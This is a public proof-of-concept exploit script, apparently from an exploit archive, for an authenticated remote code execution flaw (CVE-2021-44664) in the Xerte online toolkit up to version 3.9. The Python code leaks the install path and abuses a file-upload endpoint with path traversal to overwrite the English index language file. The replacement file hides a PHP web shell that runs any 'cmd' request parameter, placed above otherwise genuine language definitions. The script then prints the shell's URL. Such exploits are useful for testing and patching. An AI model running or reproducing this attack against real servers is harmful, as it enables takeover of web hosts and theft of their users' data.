# Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip
# Version: up until version 3.9
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44664
# This PoC assumes guest login is enabled and the en-GB langues files are used.
# This PoC wil overwrite the existing langues file (.inc) for the englisch index page with a shell.
# Vulnerable url: https://<host>/website_code/php/import/fileupload.php
# The mediapath variable can be used to set the destination of the uploaded.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota
import requests
import re
xerte_base_url = "http://127.0.0.1"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.
with requests.Session() as session:
# Get a PHP session ID
if not php_session_id:
session.get(xerte_base_url)
else:
session.cookies.set("PHPSESSID", php_session_id)
# Use a default template
data = {
'tutorialid': 'Nottingham',
'templatename': 'Nottingham',
'tutorialname': 'exploit',
'folder_id': ''
}
# Create a new project in order to find the install path
template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)
# Find template ID
data = {
'template_id': re.findall('(\d+)', template_id.text)[0]
}
# Find the install path:
install_path = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
install_path = re.findall('mediapath" value="(.+?)"', install_path.text)[0]
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3',
'Content-Type': 'multipart/form-data; boundary=---------------------------170331411929658976061651588978',
}
# index.inc file
data = \
'''-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc"
Content-Type: application/octet-stream
<?php
if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }
/**
*
* index.php english language file
*
* @author Patrick Lockley
* @version 1.0
* @copyright Pat Lockley
* @package
*/
define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password");
define("INDEX_USERNAME_EMPTY", "Please enter your username");
define("INDEX_PASSWORD_EMPTY", "Please enter your password");
define("INDEX_LDAP_MISSING", "PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");
define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page");
define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct");
define("INDEX_LOGIN", "login area");
define("INDEX_USERNAME", "Username");
define("INDEX_PASSWORD", "Password");
define("INDEX_HELP_TITLE", "Getting Started");
define("INDEX_HELP_INTRODUCTION", "We\'ve produced a short introduction to the Toolkits website.");
define("INDEX_HELP_INTRO_LINK_TEXT","Show me!");
define("INDEX_NO_LDAP","PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");
define("INDEX_FOLDER_PROMPT","What would you like to call your folder?");
define("INDEX_WORKSPACE_TITLE","My Projects");
define("INDEX_CREATE","Project Templates");
define("INDEX_DETAILS","Project Details");
define("INDEX_SORT","Sort");
define("INDEX_SEARCH","Search");
define("INDEX_SORT_A","Alphabetical A-Z");
define("INDEX_SORT_Z","Alphabetical Z-A");
define("INDEX_SORT_NEW","Age (New to Old)");
define("INDEX_SORT_OLD","Age (Old to New)");
define("INDEX_LOG_OUT","Log out");
define("INDEX_LOGGED_IN_AS","Logged in as");
define("INDEX_BUTTON_LOGIN","Login");
define("INDEX_BUTTON_LOGOUT","Logout");
define("INDEX_BUTTON_PROPERTIES","Properties");
define("INDEX_BUTTON_EDIT","Edit");
define("INDEX_BUTTON_PREVIEW", "Preview");
define("INDEX_BUTTON_SORT", "Sort");
define("INDEX_BUTTON_NEWFOLDER", "New Folder");
define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create");
define("INDEX_BUTTON_DELETE", "Delete");
define("INDEX_BUTTON_DUPLICATE", "Duplicate");
define("INDEX_BUTTON_PUBLISH", "Publish");
define("INDEX_BUTTON_CANCEL", "Cancel");
define("INDEX_BUTTON_SAVE", "Save");
define("INDEX_XAPI_DASHBOARD_FROM", "From:");
define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:");
define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:");
define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups");
define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses");
define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard");
define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options");
define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns");
define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview");
define("INDEX_XAPI_DASHBOARD_PRINT", "Print");
\r
\r
-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="mediapath"
''' \
+ install_path \
+ '''../../../languages/en-GB/
-----------------------------170331411929658976061651588978--\r
'''
# Overwrite index.inc file
response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php', headers=headers, data=data)
print('Installation path: ' + install_path)
print(response.text)
if "success" in response.text:
print("Visit shell @: " + xerte_base_url + '/?cmd=whoami')
